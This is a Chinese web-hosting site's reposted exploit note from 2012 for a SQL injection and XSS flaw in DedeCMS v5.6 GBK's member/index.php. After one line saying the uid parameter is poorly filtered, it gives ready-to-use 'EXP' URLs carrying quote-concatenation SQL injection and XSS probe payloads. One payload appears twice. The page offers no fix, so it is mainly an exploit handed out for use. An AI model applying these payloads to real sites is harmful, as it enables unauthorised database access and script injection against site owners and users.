鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 脚本攻防 > >

dedecms v5.6 GBK 注入漏洞利用(member/index.php)

来源:互联网 作者:佚名 时间:2012-10-19 09:14
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
EXP:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
EXP:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';

htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'")/>


htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'">
网友评论
<